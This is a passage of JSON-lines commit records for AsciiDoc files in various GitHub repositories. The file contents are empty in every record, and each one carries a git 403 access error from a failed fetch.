README-zh.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79f5da9a5f039ef80e43894aee7e31bea828d325","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"600dd6ba0d17762a4b35ed4c11838ee31d35f7af","subject":"Add changes file.","message":"Add changes file.\n","repos":"funcool\/buddy-core,funcool\/buddy-core","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/buddy-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de1ca603926a7516a7e90ed1a458cfb63ac2bb00","subject":"Update 2015-06-18-Teilen-ist-wichtig.adoc","message":"Update 2015-06-18-Teilen-ist-wichtig.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f9ebd725b4dabfc05333e60dc5c99065019812f","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 
2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb00d12b1492440d5c9084cdf65aba94e22e1df5","subject":"Update 2015-09-07-test.adoc","message":"Update 2015-09-07-test.adoc","repos":"simpleHoChun\/blog,simpleHoChun\/blog,simpleHoChun\/blog","old_file":"_posts\/2015-09-07-test.adoc","new_file":"_posts\/2015-09-07-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simpleHoChun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"490ca2d484d4395c9799a9f3c2f2d3e2f3a51240","subject":"Update 2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","message":"Update 2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","new_file":"_posts\/2015-12-08-Components-hacked-into-Struts2-java-web-framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd3911f8c2fb1b67a71b89c07e54ce8e9cab9a3f","subject":"Update 2016-09-09-Babel.adoc","message":"Update 2016-09-09-Babel.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-09-09-Babel.adoc","new_file":"_posts\/2016-09-09-Babel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"779f5f768c90c07e08501c03ea9ca6e3f5eab388","subject":"corrected header level within qualitative-analysis","message":"corrected header level within qualitative-analysis\n","repos":"kitenco\/aim42,aim42\/aim42,feststelltaste\/aim42,aim42\/aim42,feststelltaste\/aim42,rschimmack\/aim42,kitenco\/aim42,rschimmack\/aim42","old_file":"src\/main\/asciidoc\/patterns\/analyze\/qualitative-analysis.adoc","new_file":"src\/main\/asciidoc\/patterns\/analyze\/qualitative-analysis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rschimmack\/aim42.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b51d1095964cc7fb2458859e940f97e59c7610f","subject":"Update 2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","message":"Update 
2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","repos":"mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog","old_file":"_posts\/2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","new_file":"_posts\/2016-07-27-A-List-of-Things-To-Do-In-Near-Clemson-SC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrtrombley\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea53b66bf43191fe7163896d01a44563721c5b80","subject":"Follows std","message":"Follows std\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19137eec00e23212cec98fe482cab5d4a29f146e","subject":"Add guiding philosophy document","message":"Add guiding philosophy document\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/guiding-philosophy.adoc","new_file":"docs\/guiding-philosophy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"737f119055ea1c8d37a32ae00f046a1c978c425d","subject":"y2b create post TDK 3 Speaker Boombox Unboxing \\u0026 Overview","message":"y2b create post TDK 3 Speaker Boombox Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-21-TDK-3-Speaker-Boombox-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-04-21-TDK-3-Speaker-Boombox-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23309590021434a395ce94d2967c78235097d662","subject":"add README.adoc to make github pretty","message":"add README.adoc to make github pretty\n","repos":"Yubico\/yubioath-android,Yubico\/yubioath-android,nmikhailov\/yubioath-android","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubioath-android.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a61cda0bf4b34a619ee33b37986248804d631e4f","subject":"symlinked README","message":"symlinked README\n","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"90386344a3595e56852c0475b723e3477c7e6b86","subject":"Add archive text to README.adoc","message":"Add archive text to 
README.adoc\n","repos":"spring-projects\/spring-android-samples,spring-projects\/spring-android-samples,spring-projects\/spring-android-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-android-samples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d4e690378fc178e1a8ebd0feee2e16eb42968c5","subject":"add README","message":"add README\n","repos":"torstenwerner\/playgo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/torstenwerner\/playgo.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"fdf191fc8a8e32330713a42a297b21e34c7ca289","subject":"Update 2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","message":"Update 2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","new_file":"_posts\/2013-11-13-Digital-Ocean-Hospedagem-na-nuvem-de-forma-rapida-e-facil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32969e9962cb4e18cb7fa1a25d535f778e719bd5","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40f0f92caf76b47665aee57616b509ba4ec4ad67","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-perl-client,Yubico\/yubico-perl-client","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-perl-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ea9a8b8c33f148e5a8b26222383cf190176c590f","subject":"readme: Add an explanation of the term `dotfiles`","message":"readme: Add an explanation of the term `dotfiles`\n\nWhile it is highly unlikely, that someone who does not know what\ndotfiles are stumbles upon this repository, I still want a basic\nexplanation for completeness sake.\n\nThe section is very basic and lacks detail, which I believe to be\nappropriate: this repository is about the dotfiles themselves and not\nthe meaning or history behind the term.\n","repos":"PigeonF\/.dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6b338036d34a20b7dcd702ba4fea432a8705746","subject":"updated Readme","message":"updated Readme\n","repos":"cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,sdaschner\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"334d8236b79fd9438518b1b8039be3f706b55224","subject":"Readme: add warning about AD and unencrypted connection","message":"Readme: add warning about AD and unencrypted connection\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e94cda1d5fd07d171010618fcba718c6b3c9788e","subject":"switch to table for software versions","message":"switch to table for software versions\n","repos":"azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f7606008dc06a63a374c3fe87c3381314dc6373","subject":"Update README","message":"Update README\n","repos":"pjanouch\/liberty,pjanouch\/liberty","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/liberty.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"1876cd61b9bec585e162afeff7bbdf08712723f4","subject":"Extend prerequisities section","message":"Extend prerequisities section\n\nFixes #50\n","repos":"redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,BBVA\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b26030b1d6a6b77f3a66d03b04b4af9da6a032fb","subject":"Added good lookin' ASCII banner to root README","message":"Added good lookin' ASCII banner to root README\n","repos":"eset\/malware-research,eset\/malware-research,eset\/malware-research,eset\/malware-research","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-research.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f7aeec81fcfcefe6f2750af39cb87497bcd65c9b","subject":"First dump to the README","message":"First dump to the 
README\n","repos":"insideqt\/awesome-qt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/insideqt\/awesome-qt.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"78affc73107d7c396c6a03d04ca29135d0380bc0","subject":"Grammar and formatting fixes.","message":"Grammar and formatting fixes.\n","repos":"imosquera\/spinnaker,duftler\/spinnaker,skim1420\/spinnaker,spinnaker\/spinnaker,stitchfix\/spinnaker,ewiseblatt\/spinnaker,jtk54\/spinnaker,jtk54\/spinnaker,spinnaker\/spinnaker,tgracchus\/spinnaker,duftler\/spinnaker,stitchfix\/spinnaker,duftler\/spinnaker,tgracchus\/spinnaker,duftler\/spinnaker,stitchfix\/spinnaker,Roshan2017\/spinnaker,ewiseblatt\/spinnaker,imosquera\/spinnaker,ewiseblatt\/spinnaker,Roshan2017\/spinnaker,skim1420\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,ewiseblatt\/spinnaker,skim1420\/spinnaker,spinnaker\/spinnaker,Roshan2017\/spinnaker,jtk54\/spinnaker,tgracchus\/spinnaker,spinnaker\/spinnaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duftler\/spinnaker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a07f1a139ede34d7b103782032314def87cc7da","subject":"Deleted 2016-6-28-PHPER-authority-control.adoc","message":"Deleted 2016-6-28-PHPER-authority-control.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control.adoc","new_file":"2016-6-28-PHPER-authority-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7647b5e0274d0ea4af1786f638b9447d87c2b5ff","subject":"Update 2015-06-26-Hello-World.adoc","message":"Update 2015-06-26-Hello-World.adoc","repos":"gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io","old_file":"_posts\/2015-06-26-Hello-World.adoc","new_file":"_posts\/2015-06-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdbremer\/gerdbremer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63d79a4d2e40ba1652861b7eea668d84f3b1b275","subject":"snapshot","message":"snapshot\n","repos":"isaacs\/nshtools","old_file":"TODO-0.0.1.asciidoc","new_file":"TODO-0.0.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/isaacs\/nshtools.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c1bdbaa032e4237b77359c6d3a77f4fdf3067d54","subject":"Update 2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","message":"Update 
2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a226760ac89ea6c8bf99fddce598e91e8fc0100","subject":"Update 2015-10-06-Scala-Basics.adoc","message":"Update 2015-10-06-Scala-Basics.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23166a625f1115dab2514e1587754578738d2db2","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"153f91777f90e45f2683d574a376031bcb4dcb30","subject":"y2b create post The Black Friday Deals They Won't Show You...","message":"y2b create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-23-TheBlackFridayDealsTheyWontShowYou.adoc","new_file":"_posts\/2017-11-23-TheBlackFridayDealsTheyWontShowYou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fb5ad28d77d42cbc06b2f2e648f88826df25408","subject":"Add readme with badges","message":"Add readme with badges\n","repos":"jirutka\/ngx-oauth,jirutka\/ngx-oauth","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/ngx-oauth.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c862f10202c25c2a3fce966112e3a8e550a39c9f","subject":"Oops, wrong quote","message":"Oops, wrong quote\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"40b0eb5cd0c58e3ab189c7c15b1e6417ba3d92bf","subject":"some explanation on 
plans\/not plans","message":"some explanation on plans\/not plans\n","repos":"jzacsh\/study,jzacsh\/study,jzacsh\/study","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/study.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"2d83d73b637e75a357b06aa2b60c3aae582628fe","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-rest-to-soap","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-rest-to-soap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23337d923889de84be5932cad269ca12434da804","subject":"Added README.adoc","message":"Added README.adoc\n","repos":"jenkinsci\/sbuild-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/sbuild-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1949c210c57f3252bab57e73f5826b4e8068dd6","subject":"Updated README screencast URL","message":"Updated README screencast URL\n\nNecessary to point to new URL which doesn't force the HTML format (will\nprovide more flexibility in the future).\n","repos":"bkuhlmann\/git-cop,bkuhlmann\/git-cop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/git-cop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51ed57eb83bef8a7a15be343a68b58360074ac64","subject":"update docs","message":"update docs\n","repos":"CommercialTribe\/psykube,CommercialTribe\/psykube,CommercialTribe\/psykube","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CommercialTribe\/psykube.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a69a08de77c9ea1dac59fae71a044a91467540","subject":"Minor readme fix","message":"Minor readme fix\n","repos":"joshuagn\/ANPR,justhackit\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,adi9090\/javaanpr,adi9090\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c874acde8d008ddb1eb7e2627222eae9d976ffb","subject":"Update 2015-02-20-Test.adoc","message":"Update 2015-02-20-Test.adoc","repos":"ron194\/ron194.github.io,ron194\/ron194.github.io,ron194\/ron194.github.io","old_file":"_posts\/2015-02-20-Test.adoc","new_file":"_posts\/2015-02-20-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ron194\/ron194.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"925eda03429fcba4e751cd89d6d604f1846a3596","subject":"y2b create post This Click Could Change The Rest Of Your Clicks...","message":"y2b create post This Click Could Change The Rest Of Your 
Clicks...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-09-This-Click-Could-Change-The-Rest-Of-Your-Clicks.adoc","new_file":"_posts\/2017-07-09-This-Click-Could-Change-The-Rest-Of-Your-Clicks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7c7a36ce7dd30f091eaed4cd5235ac74d3c4648","subject":"Update 2018-11-11-1.adoc","message":"Update 2018-11-11-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-1.adoc","new_file":"_posts\/2018-11-11-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51efa6ad6d57750f449e186b47f18bd41b0cfb78","subject":"y2b create post How To Draw In 3D","message":"y2b create post How To Draw In 3D","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-23-How-To-Draw-In-3D.adoc","new_file":"_posts\/2015-12-23-How-To-Draw-In-3D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb2d7c5e94b66a313e046a56862b9d202435a532","subject":"Deleted 2016-12-2-three-dimensional-pen-of-dream.adoc","message":"Deleted 2016-12-2-three-dimensional-pen-of-dream.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d71bf89a93a995565c6570fe529cfa3f2817a49","subject":"Update 2015-07-14-Scheduling-deep-scrubs.adoc","message":"Update 2015-07-14-Scheduling-deep-scrubs.adoc","repos":"jbroszat\/jbroszat.github.io,jbroszat\/jbroszat.github.io,jbroszat\/jbroszat.github.io","old_file":"_posts\/2015-07-14-Scheduling-deep-scrubs.adoc","new_file":"_posts\/2015-07-14-Scheduling-deep-scrubs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbroszat\/jbroszat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ee77a5c293b5da2d5919752a1f9f2b3e6713117","subject":"OGM-683 Minor typo","message":"OGM-683 Minor 
typo\n","repos":"DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,uugaa\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD